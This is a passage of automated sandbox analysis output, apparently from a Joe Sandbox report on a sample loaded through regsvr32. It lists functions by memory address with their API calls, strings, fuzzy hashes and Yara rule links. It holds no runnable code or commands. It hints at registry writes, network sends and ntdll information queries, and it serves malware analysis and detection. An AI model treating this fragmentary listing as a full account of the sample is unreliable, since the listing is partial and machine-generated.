Part of subcall function 02E654AC: free.LIBCMT ref: 02E65581
Part of subcall function 02E654AC: free.LIBCMT ref: 02E65596
Part of subcall function 02E654AC: free.LIBCMT ref: 02E655AB

free.LIBCMT ref: 02E5F174

Part of subcall function 02E55280: HeapFree.KERNEL32 ref: 02E55296
Part of subcall function 02E55280: _errno.LIBCMT ref: 02E552A0
Part of subcall function 02E55280: GetLastError.KERNEL32 ref: 02E552A8

free.LIBCMT ref: 02E5F196
__free_lconv_num.LIBCMT ref: 02E5F1A2
free.LIBCMT ref: 02E5F1AE
free.LIBCMT ref: 02E5F1BA
free.LIBCMT ref: 02E5F1DE
free.LIBCMT ref: 02E5F1F2
free.LIBCMT ref: 02E5F201
free.LIBCMT ref: 02E5F20D
free.LIBCMT ref: 02E5F23A
free.LIBCMT ref: 02E5F262
free.LIBCMT ref: 02E5F27C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
String ID:
API String ID: 518839503-0
Opcode ID: 793502283a8cb49350656c0ec5e5d9694461158cf1e27e4be6b183f55cf5cd15
Instruction ID: b8f66243cc33d327ff9ea34f01471855a02cf483f0b9b654a984df88c094ef0c
Opcode Fuzzy Hash: 793502283a8cb49350656c0ec5e5d9694461158cf1e27e4be6b183f55cf5cd15
Instruction Fuzzy Hash: 5D312D3A6A26A088DF55DFE1C5543BD2321EB86B9CF88A431DE4D4BA54CF38C491C7A1

Function 02E67074 Relevance: 18.1, APIs: 12, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 02E670A8

Part of subcall function 02E62988: _errno.LIBCMT ref: 02E62991
Part of subcall function 02E62988: _invalid_parameter_noinfo.LIBCMT ref: 02E6299C

_fileno.LIBCMT ref: 02E670C3
_fileno.LIBCMT ref: 02E670D0
_fileno.LIBCMT ref: 02E670DF

Part of subcall function 02E5C638: _fileno.LIBCMT ref: 02E5C655
Part of subcall function 02E5C638: _errno.LIBCMT ref: 02E5C665

_fileno.LIBCMT ref: 02E67109
_fileno.LIBCMT ref: 02E67116
_fileno.LIBCMT ref: 02E67123
_fileno.LIBCMT ref: 02E67132
_fileno.LIBCMT ref: 02E6715C
_fileno.LIBCMT ref: 02E67169
_fileno.LIBCMT ref: 02E67176
_fileno.LIBCMT ref: 02E67185

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _fileno$_errno$_invalid_parameter_noinfo
String ID:
API String ID: 482796045-0
Opcode ID: c48717b30ae9b74f7ac66b91d84a3b4c92b1bb28475cd271dfa275c582b4941c
Instruction ID: 2d2c44f8111aaac1f77294112be2012fb3017cecc28d2df194caf2456621335b
Opcode Fuzzy Hash: c48717b30ae9b74f7ac66b91d84a3b4c92b1bb28475cd271dfa275c582b4941c
Instruction Fuzzy Hash: F05106622D468585CA289F39999827DA321FB82BEC758F702EF7A476D4CB2CC452C710

Function 028834C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028834F4
_getptd.LIBCMT ref: 02883508
_getptd.LIBCMT ref: 02883542
_getptd.LIBCMT ref: 0288354E
_getptd.LIBCMT ref: 0288355A
_CreateFrameInfo.LIBCMT ref: 0288356F

Part of subcall function 02881E34: _getptd.LIBCMT ref: 02881E40
Part of subcall function 02881E34: _getptd.LIBCMT ref: 02881E4E
Part of subcall function 02881E34: _getptd.LIBCMT ref: 02881E62

_getptd.LIBCMT ref: 0288358D
_getptd.LIBCMT ref: 02883693
_getptd.LIBCMT ref: 0288369F

Strings

csm, xrefs: 02883653

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _getptd$CreateFrameInfo
String ID: csm
API String ID: 4181383844-1018135373
Opcode ID: f7c0f49ba4beedef2b7976ee9fce1622404532abdfe6423b84f5cde918012730
Instruction ID: 37054aba517f279c7e53f9036af7c6a1c8ab26483d689a0b26d3dc82c90ad395
Opcode Fuzzy Hash: f7c0f49ba4beedef2b7976ee9fce1622404532abdfe6423b84f5cde918012730
Instruction Fuzzy Hash: FA417F78519B498FDBA4FF2C8449BB9B3E1FB99315F5005AED48DC3611DB30E8528B82

Function 028C3BD1 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028C3C01
_getptd.LIBCMT ref: 028C3C15
_getptd.LIBCMT ref: 028C3C4F
_getptd.LIBCMT ref: 028C3C5B
_getptd.LIBCMT ref: 028C3C67
_CreateFrameInfo.LIBCMT ref: 028C3C7C

Part of subcall function 028C2541: _getptd.LIBCMT ref: 028C254D
Part of subcall function 028C2541: _getptd.LIBCMT ref: 028C255B
Part of subcall function 028C2541: _getptd.LIBCMT ref: 028C256F

_getptd.LIBCMT ref: 028C3C9A
_getptd.LIBCMT ref: 028C3DA0
_getptd.LIBCMT ref: 028C3DAC

Strings

csm, xrefs: 028C3D60

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _getptd$CreateFrameInfo
String ID: csm
API String ID: 4181383844-1018135373
Opcode ID: f7c0f49ba4beedef2b7976ee9fce1622404532abdfe6423b84f5cde918012730
Instruction ID: 87c38629319c6ea7946a262838cf23a5783310f770292b72611d81200a2985fa
Opcode Fuzzy Hash: f7c0f49ba4beedef2b7976ee9fce1622404532abdfe6423b84f5cde918012730
Instruction Fuzzy Hash: 10412A78618B098FD6B4EF6C8455BAA73E1FF59311F64456EE18DC3611DB30E8428F82

Function 02E58F50 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E58F80

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

_getptd.LIBCMT ref: 02E58F94
_getptd.LIBCMT ref: 02E58FCE
_getptd.LIBCMT ref: 02E58FDA
_getptd.LIBCMT ref: 02E58FE6
_CreateFrameInfo.LIBCMT ref: 02E58FFB

Part of subcall function 02E57934: _getptd.LIBCMT ref: 02E57940
Part of subcall function 02E57934: _getptd.LIBCMT ref: 02E5794E
Part of subcall function 02E57934: _getptd.LIBCMT ref: 02E57962

_getptd.LIBCMT ref: 02E59019
_getptd.LIBCMT ref: 02E5911F
_getptd.LIBCMT ref: 02E5912B

Strings

csm, xrefs: 02E590DF

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _getptd$CreateFrameInfo_amsg_exit
String ID: csm
API String ID: 2825728721-1018135373
Opcode ID: 28f5b8f5928c2bab68e4158101839e7a7904bf0c9a5fe69cd0b7fe63bdef1c08
Instruction ID: 25ee5bcc847b13ff7c761fee38c53a859b0206881ed6965dd817d7668c0a3055
Opcode Fuzzy Hash: 28f5b8f5928c2bab68e4158101839e7a7904bf0c9a5fe69cd0b7fe63bdef1c08
Instruction Fuzzy Hash: 7C41A336254BA1C6C7309F12E8403AEB7A5F788B98F059225EF9D07B54DF38C0A5CB50

Function 02E69054 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E6907C
_invalid_parameter_noinfo.LIBCMT ref: 02E69087
__wtomb_environ.LIBCMT ref: 02E69169
_errno.LIBCMT ref: 02E69172
free.LIBCMT ref: 02E69263
SetEnvironmentVariableA.KERNEL32 ref: 02E69394
_errno.LIBCMT ref: 02E693A1
free.LIBCMT ref: 02E693AF
free.LIBCMT ref: 02E693BC
free.LIBCMT ref: 02E693E3

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
String ID:
API String ID: 101574016-0
Opcode ID: c7ab4824c20248cd77d5d216f2600469411963f07d5dc115475ca10161a63df4
Instruction ID: 283413480f36d8528415c42e462b3c979652abf932905b69b13aa5b7c0182553
Opcode Fuzzy Hash: c7ab4824c20248cd77d5d216f2600469411963f07d5dc115475ca10161a63df4
Instruction Fuzzy Hash: 939103253D2B9082EF15AB26A90C37A6695FB40BDCF59E625DE5E0B795EF38C042C310

Function 02E45F30 Relevance: 16.6, APIs: 11, Instructions: 114COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 02E45F58
EnterCriticalSection.KERNEL32 ref: 02E45F7A
SetLastError.KERNEL32 ref: 02E45F8D
LeaveCriticalSection.KERNEL32 ref: 02E45F97

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 4efe19a53c5f1bbbb6770299ba61f7da19085229a5c567b4a8f2ec6ecf7074f0
Instruction ID: 1d040f07ed8ca27584cedda7efee3f4292df8ab3f621ac121a00dd6628f01322
Opcode Fuzzy Hash: 4efe19a53c5f1bbbb6770299ba61f7da19085229a5c567b4a8f2ec6ecf7074f0
Instruction Fuzzy Hash: D841D3322846848BD754AF35F84CB1E73A9FB59BA5F45A136DA1B83B90DF38D444CB01

Function 02E46380 Relevance: 16.6, APIs: 11, Instructions: 98networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 02E463C4
WSASetLastError.WS2_32 ref: 02E463D6
LeaveCriticalSection.KERNEL32 ref: 02E463E0

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 90b2d3d72562b85b932b95850fd759897480d03085588f29b6ae233e826b8c72
Instruction ID: 4510d1f54b3251250a1fc35c35a581e068de759c88d4c7620b1a90eaaa739fdb
Opcode Fuzzy Hash: 90b2d3d72562b85b932b95850fd759897480d03085588f29b6ae233e826b8c72
Instruction Fuzzy Hash: E331633139468082EB24AF26F91C36A7315F786BE5F44A1319E2B87FA5DF29D495C700

Function 02E4FA10 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 52registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 02E4FA61
RegDeleteValueW.ADVAPI32 ref: 02E4FA6F
RegCloseKey.ADVAPI32 ref: 02E4FA7A
RegCreateKeyW.ADVAPI32 ref: 02E4FA9A
lstrlenW.KERNEL32 ref: 02E4FAA7
RegSetValueExW.ADVAPI32 ref: 02E4FAC9
RegCloseKey.ADVAPI32 ref: 02E4FAD4

Strings

AppEvents, xrefs: 02E4FA3E
Network, xrefs: 02E4FA37

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseValue$CreateDeleteOpenlstrlen
String ID: AppEvents$Network
API String ID: 3197061591-3733486940
Opcode ID: df353acfe061e84203d7ac4a4d8559ebe72ca993a1af8a6bb5186c314d41c4c8
Instruction ID: 830b6116cf4bbe77a9f213b8fb3ee9d9efae7bf291473e036e9468a70befc3a2
Opcode Fuzzy Hash: df353acfe061e84203d7ac4a4d8559ebe72ca993a1af8a6bb5186c314d41c4c8
Instruction Fuzzy Hash: FB112C76318A8086EB509B12F84C75AB7A1F7A4BE5F444121EE9A47FA8CF7CC149CB04

Function 02E5A350 Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 02E5A477

Part of subcall function 02E5E590: GetLastError.KERNEL32 ref: 02E5E5F4
Part of subcall function 02E5E590: free.LIBCMT ref: 02E5E672

free.LIBCMT ref: 02E5A63F
free.LIBCMT ref: 02E5A64F
free.LIBCMT ref: 02E5A65F
free.LIBCMT ref: 02E5A66B
free.LIBCMT ref: 02E5A6C0
free.LIBCMT ref: 02E5A6C8
free.LIBCMT ref: 02E5A6D0
free.LIBCMT ref: 02E5A6D8
free.LIBCMT ref: 02E5A6E2

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$ErrorInfoLast
String ID:
API String ID: 189849726-0
Opcode ID: b3486acb5be8b198c16fe08b771984a76368ce0ba2e95de7802cfff15c464e33
Instruction ID: c826567517af5d063e57e874a5134cf58e793cd2277b3dc196086ab11a7aa5eb
Opcode Fuzzy Hash: b3486acb5be8b198c16fe08b771984a76368ce0ba2e95de7802cfff15c464e33
Instruction Fuzzy Hash: BCB1CD323657A08ACB11CF65E0547AE77A5F748B88F84923AEF9987754EF39C141CB40

Function 02E68B80 Relevance: 15.2, APIs: 10, Instructions: 250COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 02E68C73
MultiByteToWideChar.KERNEL32 ref: 02E68CF2
MultiByteToWideChar.KERNEL32 ref: 02E68D99
MultiByteToWideChar.KERNEL32 ref: 02E68DBF

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 2d90b2b54ccd2e60352f476bd800f3d2100da5d7e85102e0396c8d6fc970bf6c
Instruction ID: 34ecb24b5e88b35f4029d93c86f1067285707984111068dead8909a38c87172a
Opcode Fuzzy Hash: 2d90b2b54ccd2e60352f476bd800f3d2100da5d7e85102e0396c8d6fc970bf6c
Instruction Fuzzy Hash: D09104627C67804ADB30CF2598583BA3BA7F745BECF48E616EA6957784DB34C448C301

Function 02E59E30 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 02E59ECA
malloc.LIBCMT ref: 02E59F33
MultiByteToWideChar.KERNEL32 ref: 02E59F67
LCMapStringW.KERNEL32 ref: 02E59F8E
LCMapStringW.KERNEL32 ref: 02E59FD6
malloc.LIBCMT ref: 02E5A033

Part of subcall function 02E552C0: _FF_MSGBANNER.LIBCMT ref: 02E552F0
Part of subcall function 02E552C0: HeapAlloc.KERNEL32 ref: 02E55315
Part of subcall function 02E552C0: _callnewh.LIBCMT ref: 02E5532E
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55339
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55344

LCMapStringW.KERNEL32 ref: 02E5A068
WideCharToMultiByte.KERNEL32 ref: 02E5A0A8
free.LIBCMT ref: 02E5A0BC
free.LIBCMT ref: 02E5A0CD

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
String ID:
API String ID: 1080698880-0
Opcode ID: 212a4c3b0deda1fbab8d7a46e28323f5a226f924b4e173925b22eeaff756e0a3
Instruction ID: 7635308c4f16f5d10fd2dcd58ef588e186b486263485b01fd87ce01557eb0de5
Opcode Fuzzy Hash: 212a4c3b0deda1fbab8d7a46e28323f5a226f924b4e173925b22eeaff756e0a3
Instruction Fuzzy Hash: 5571C23236479086DB248F26D4442AAB7A5FB48BECF44A729EF5D47B94DF38C540C740

Function 02E66C00 Relevance: 15.1, APIs: 10, Instructions: 123COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E66C47
_invalid_parameter_noinfo.LIBCMT ref: 02E66C53
_errno.LIBCMT ref: 02E66C9D
_errno.LIBCMT ref: 02E66CA8
_errno.LIBCMT ref: 02E66CDA
_invalid_parameter_noinfo.LIBCMT ref: 02E66CE4
WideCharToMultiByte.KERNEL32 ref: 02E66D56
GetLastError.KERNEL32 ref: 02E66D73
_errno.LIBCMT ref: 02E66D99
_invalid_parameter_noinfo.LIBCMT ref: 02E66DA5

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 2295021086-0
Opcode ID: 1d646d828de0aace6474db1b56eecb5c83fbf8c445fe68ef6d6efd0ca843a860
Instruction ID: c44ae1d04e7db19d4e65b77755ac638ae776cfa841b3b73e4bd80b0ed80f83b8
Opcode Fuzzy Hash: 1d646d828de0aace6474db1b56eecb5c83fbf8c445fe68ef6d6efd0ca843a860
Instruction Fuzzy Hash: C741F7726E1B908AEB219F25C4483FC766AF741BECF18E625DE591BA94DB3C8041C711

Function 02E61C70 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 02E61C91

Part of subcall function 02E5A860: Sleep.KERNEL32 ref: 02E5A8A5

GetFileType.KERNEL32 ref: 02E61DFC
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 02E61E3A

Strings

@, xrefs: 02E61EF5

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
String ID: @
API String ID: 3473179607-2766056989
Opcode ID: ab5030fe6963260d57b7d113dea0ca27346005c31587775712d3cdfdcbca818d
Instruction ID: f14102ea7a614d9f3facf46349c55cbef990432b346e6b994b515593eaf8f81b
Opcode Fuzzy Hash: ab5030fe6963260d57b7d113dea0ca27346005c31587775712d3cdfdcbca818d
Instruction Fuzzy Hash: AB817B62280BC486DB158F25E88C3697765FB45BB8F58E329CA7E4B7E4EB78C055C310

Function 02E4A550 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 02E4A55D
GetProcAddress.KERNEL32 ref: 02E4A575
GetProcAddress.KERNEL32 ref: 02E4A58C
GetProcAddress.KERNEL32 ref: 02E4A5A3

Strings

ZwQuerySystemInformation, xrefs: 02E4A592
ZwQueryInformationProcess, xrefs: 02E4A56B
ZwQueryObject, xrefs: 02E4A57B
ntdll.dll, xrefs: 02E4A556

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ZwQueryInformationProcess$ZwQueryObject$ZwQuerySystemInformation$ntdll.dll
API String ID: 667068680-3590752221
Opcode ID: 7eda7db14e39e4496a90eac640427b40b534a2017adf1ab763c42458caa272a6
Instruction ID: e091d262c47da8169c581c0c0c753b5f5b86e3b6561b2335185b5d5c4736150f
Opcode Fuzzy Hash: 7eda7db14e39e4496a90eac640427b40b534a2017adf1ab763c42458caa272a6
Instruction Fuzzy Hash: A411C4606C6BC582FF149B11F86C35433E0E7587A8F895436C89E063A0EF7D85D9C790

Function 02E461F0 Relevance: 13.6, APIs: 9, Instructions: 101timenetworkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 02E4625A
timeGetTime.WINMM ref: 02E46288
WSASetLastError.WS2_32 ref: 02E462A9
LeaveCriticalSection.KERNEL32 ref: 02E462B3
timeGetTime.WINMM ref: 02E462CA
SetEvent.KERNEL32 ref: 02E46304
LeaveCriticalSection.KERNEL32 ref: 02E46316
LeaveCriticalSection.KERNEL32 ref: 02E46345
WSASetLastError.WS2_32 ref: 02E4636E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEvent
String ID:
API String ID: 3019579578-0
Opcode ID: 9243fe9860c2d7fa6fe3e49f17d1100e496bc96adbcf19a71ea8e46669bffbd9
Instruction ID: 9ef7e23572bc2169a7265adec775b3e62b7304b28b3bf3b62a8bad8f94e7c77a
Opcode Fuzzy Hash: 9243fe9860c2d7fa6fe3e49f17d1100e496bc96adbcf19a71ea8e46669bffbd9
Instruction Fuzzy Hash: 96416A32244A808BDB309B26F40432EB765F789B58F04A116DB9A83F64DF38E495CB04

Function 02E67E78 Relevance: 13.6, APIs: 9, Instructions: 81COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 02E67EA1
_errno.LIBCMT ref: 02E67EAA
__doserrno.LIBCMT ref: 02E67F08
_errno.LIBCMT ref: 02E67F0F
_invalid_parameter_noinfo.LIBCMT ref: 02E67F73

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2315031519-0
Opcode ID: 5f53cfc1179e25de2a7bc686976dccc490792cdf04e3233ada5533c2cb284a6f
Instruction ID: 3da3dfdacc95f8e3abd168cf283dc684dafdbf4201dda8da92ffcfd8d9b6d351
Opcode Fuzzy Hash: 5f53cfc1179e25de2a7bc686976dccc490792cdf04e3233ada5533c2cb284a6f
Instruction Fuzzy Hash: 5321BB713E06D089C716AF66D88863DBA92E740BE8F96F515FE250B791CBB8C441CB60

Function 02E460D0 Relevance: 13.6, APIs: 9, Instructions: 73COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 02E460EA
TryEnterCriticalSection.KERNEL32 ref: 02E4610B
TryEnterCriticalSection.KERNEL32 ref: 02E4611D
SetLastError.KERNEL32 ref: 02E46136
LeaveCriticalSection.KERNEL32 ref: 02E46140
LeaveCriticalSection.KERNEL32 ref: 02E4614A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 48dac4b21eb6e7b5e3d8e5b91d253a18b64a32894f61ad1e43b8c3cea6ed7d97
Instruction ID: fc23cf95e2f6fd33a8c50f540c3284a5af1e85f1b55c2c0ff85a048fd3d163f7
Opcode Fuzzy Hash: 48dac4b21eb6e7b5e3d8e5b91d253a18b64a32894f61ad1e43b8c3cea6ed7d97
Instruction Fuzzy Hash: 4F317F32A54680C7D710CF28F45836D37A9FB55F8CF546025DA1A87B65DF39C88AC710

Function 02E4F3D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 02E4F44D
WriteFile.KERNEL32 ref: 02E4F47E
CloseHandle.KERNEL32 ref: 02E4F48B
lstrlenW.KERNEL32 ref: 02E4F496
wsprintfW.USER32 ref: 02E4F4BC

Strings

%s %s, xrefs: 02E4F4B5

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: File$CloseCreateHandleWritelstrlenwsprintf
String ID: %s %s
API String ID: 2369136734-2939940506
Opcode ID: 5ea41a88a58f2c7f305451d4300e81fe3f17e369e3a8f1804c932f848bbce38b
Instruction ID: 8b0ab4d792e86fc613cba6b7b20f7eb2ab6d7268c7b31d709f63d4e7f2e9cb0f
Opcode Fuzzy Hash: 5ea41a88a58f2c7f305451d4300e81fe3f17e369e3a8f1804c932f848bbce38b
Instruction Fuzzy Hash: 15319E3225898592EB30CF21F8587DBB361F7C4B98F849111AA5E47EA8DF3CC649CB00

Function 0287F95C Relevance: 12.2, APIs: 8, Instructions: 165COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0287F9A3
_invalid_parameter_noinfo.LIBCMT ref: 0287F9AF
_errno.LIBCMT ref: 0287F9F9
_errno.LIBCMT ref: 0287FA04
_errno.LIBCMT ref: 0287FA36
_invalid_parameter_noinfo.LIBCMT ref: 0287FA40
_errno.LIBCMT ref: 0287FAF5
_invalid_parameter_noinfo.LIBCMT ref: 0287FB01

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 1bfa4ce99656cd686edd839c064229dc2d40e207c6faefbcbf5901de5921f6a7
Instruction ID: e8953e6723843caded9e04597b3d286cc07c127f1381f267647da8fdd866d27a
Opcode Fuzzy Hash: 1bfa4ce99656cd686edd839c064229dc2d40e207c6faefbcbf5901de5921f6a7
Instruction Fuzzy Hash: 9C51F33C514A1A9FDB25DF2DC8847BDB6A1FBA432EF184229D55DC75A0CB34C481CB52

Function 02E44A70 Relevance: 12.1, APIs: 8, Instructions: 120memorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 02E44C70: EnterCriticalSection.KERNEL32 ref: 02E44C9E
Part of subcall function 02E44C70: LeaveCriticalSection.KERNEL32 ref: 02E44CF2

send.WS2_32 ref: 02E44AC3
EnterCriticalSection.KERNEL32 ref: 02E44AD7
LeaveCriticalSection.KERNEL32 ref: 02E44AEB
HeapFree.KERNEL32 ref: 02E44B67
WSAGetLastError.WS2_32 ref: 02E44BB4
EnterCriticalSection.KERNEL32 ref: 02E44BC8
LeaveCriticalSection.KERNEL32 ref: 02E44C16
HeapFree.KERNEL32 ref: 02E44C54

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

